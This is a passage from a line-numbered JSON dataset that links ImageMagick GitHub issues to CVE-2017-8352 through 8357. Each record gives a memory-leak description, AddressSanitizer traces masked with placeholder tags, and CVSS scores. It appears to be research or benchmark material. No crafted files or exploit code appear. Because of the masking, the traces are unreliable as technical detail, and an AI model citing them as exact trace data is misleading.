  14698. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG ee0ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14700. "severity": "MEDIUM",
  14701. "baseScore": 6.5,
  14702. "impactScore": 3.6,
  14703. "exploitabilityScore": 2.8
  14704. },
  14705. {
  14706. "CVE_ID": "CVE-2017-8352",
  14707. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/452",
  14708. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/452",
  14709. "Repo_new": "imagemagick/imagemagick",
  14710. "Issue_Created_At": "2017-04-26T16:49:26Z",
  14711. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd2dbfdcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd2d NUMBERTAG ebb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14713. "severity": "MEDIUM",
  14714. "baseScore": 6.5,
  14715. "impactScore": 3.6,
  14716. "exploitabilityScore": 2.8
  14717. },
  14718. {
  14719. "CVE_ID": "CVE-2017-8353",
  14720. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/454",
  14721. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/454",
  14722. "Repo_new": "imagemagick/imagemagick",
  14723. "Issue_Created_At": "2017-04-26T16:51:22Z",
  14724. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG cdb in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG 
APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG 
f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG b3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG 
a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG b3b in APITAG 
APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG c3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG 
NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG b 
NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main 
APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14726. "severity": "MEDIUM",
  14727. "baseScore": 6.5,
  14728. "impactScore": 3.6,
  14729. "exploitabilityScore": 2.8
  14730. },
  14731. {
  14732. "CVE_ID": "CVE-2017-8354",
  14733. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/451",
  14734. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/451",
  14735. "Repo_new": "imagemagick/imagemagick",
  14736. "Issue_Created_At": "2017-04-26T16:48:51Z",
  14737. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8cd NUMBERTAG b6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f8ccb6c5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14739. "severity": "MEDIUM",
  14740. "baseScore": 6.5,
  14741. "impactScore": 3.6,
  14742. "exploitabilityScore": 2.8
  14743. },
  14744. {
  14745. "CVE_ID": "CVE-2017-8355",
  14746. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/450",
  14747. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/450",
  14748. "Repo_new": "imagemagick/imagemagick",
  14749. "Issue_Created_At": "2017-04-26T16:47:58Z",
  14750. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ff0d0 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14752. "severity": "MEDIUM",
  14753. "baseScore": 6.5,
  14754. "impactScore": 3.6,
  14755. "exploitabilityScore": 2.8
  14756. },
  14757. {
  14758. "CVE_ID": "CVE-2017-8356",
  14759. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/449",
  14760. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/449",
  14761. "Repo_new": "imagemagick/imagemagick",
  14762. "Issue_Created_At": "2017-04-26T16:47:10Z",
  14763. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG c1b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG bc2e in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG bdad0b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14765. "severity": "MEDIUM",
  14766. "baseScore": 6.5,
  14767. "impactScore": 3.6,
  14768. "exploitabilityScore": 2.8
  14769. },
  14770. {
  14771. "CVE_ID": "CVE-2017-8357",
  14772. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/453",
  14773. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/453",
  14774. "Repo_new": "imagemagick/imagemagick",
  14775. "Issue_Created_At": "2017-04-26T16:50:06Z",
